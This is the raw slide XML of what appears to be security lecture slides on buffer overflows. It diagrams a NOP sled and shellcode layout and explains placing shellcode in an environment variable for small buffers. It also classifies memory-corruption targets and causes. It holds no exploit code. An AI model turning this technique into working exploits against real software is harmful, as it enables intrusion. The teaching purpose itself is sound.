            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="4400550"/>
            <a:ext cx="762000" cy="40005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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550918" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="4400550"/>
            <a:ext cx="762000" cy="40005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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550919" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="4400550"/>
            <a:ext cx="2819400" cy="40005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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550920" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2270126" y="3968353"/>
            <a:ext cx="802661" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550921" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191001" y="4000500"/>
            <a:ext cx="456638" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>FP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550922" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800602" y="4000500"/>
            <a:ext cx="620683" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>RET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550923" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791201" y="4000500"/>
            <a:ext cx="870751" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Stack...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550924" name="Rectangle 12" descr="Horizontal brick"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="4400550"/>
            <a:ext cx="1905000" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="horzBrick">
            <a:fgClr>
              <a:schemeClr val="accent2"/>
            </a:fgClr>
            <a:bgClr>
              <a:schemeClr val="bg1"/>
            </a:bgClr>
          </a:pattFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Shell code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550925" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="5314950"/>
            <a:ext cx="5943600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550926" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581401" y="5314950"/>
            <a:ext cx="1341646" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Long String</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550927" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1066800" y="5029200"/>
            <a:ext cx="0" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550928" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7010400" y="5086350"/>
            <a:ext cx="0" cy="228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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550929" name="Rectangle 17" descr="5%"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="4400550"/>
            <a:ext cx="838200" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="pct5">
            <a:fgClr>
              <a:schemeClr val="accent2"/>
            </a:fgClr>
            <a:bgClr>
              <a:schemeClr val="bg1"/>
            </a:bgClr>
          </a:pattFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>NOPs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550930" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="5029200"/>
            <a:ext cx="3733800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550931" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1447800" y="4800600"/>
            <a:ext cx="0" cy="228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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550932" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4400550"/>
            <a:ext cx="838200" cy="40005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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550933" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8382000" y="3314700"/>
            <a:ext cx="0" cy="10287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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550934" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6400800" y="3257550"/>
            <a:ext cx="1422184" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Stack Pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550935" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="3429000"/>
            <a:ext cx="0" cy="971550"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550936" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="3714750"/>
            <a:ext cx="6934200" cy="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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550937" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895601" y="3314700"/>
            <a:ext cx="1802738" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>“Guessed” Offset</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550938" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="529431" y="1387440"/>
            <a:ext cx="8085138" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A series of NOPs is inserted at the beginning of the overflowing buffer so that the jump does not need to be exactly precise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>In x86, NOP is 0x90</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11271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09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09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09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09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509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09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509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509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509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509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509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509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5093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5093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5093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509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915" grpId="0" animBg="1"/>
      <p:bldP spid="550924" grpId="0" animBg="1"/>
      <p:bldP spid="550925" grpId="0" animBg="1"/>
      <p:bldP spid="550926" grpId="0"/>
      <p:bldP spid="550927" grpId="0" animBg="1"/>
      <p:bldP spid="550928" grpId="0" animBg="1"/>
      <p:bldP spid="550929" grpId="0" animBg="1"/>
      <p:bldP spid="550930" grpId="0" animBg="1"/>
      <p:bldP spid="550931" grpId="0" animBg="1"/>
      <p:bldP spid="550933" grpId="0" animBg="1"/>
      <p:bldP spid="550934" grpId="0"/>
      <p:bldP spid="550935" grpId="0" animBg="1"/>
      <p:bldP spid="550936" grpId="0" animBg="1"/>
      <p:bldP spid="550937" grpId="0"/>
    </p:bld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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Overflowing Small Buffers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568323" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A buffer could be too small to contain the shell code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the program has access to the parent process environment </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place the NOP + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in an environment variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pass an overflowing string containing the address of the environment variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advantage: the NOP can be as big as desired</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22164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8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83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83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83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83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Generalizing Memory Corruption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is overwritten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return address/frame pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointer to function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointer to data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Variable value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What causes the overwrite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unchecked copying overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Array indexing overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loop overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where is overwritten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heap/BSS/DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GOT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24920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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What Is Overwritten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="623619" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
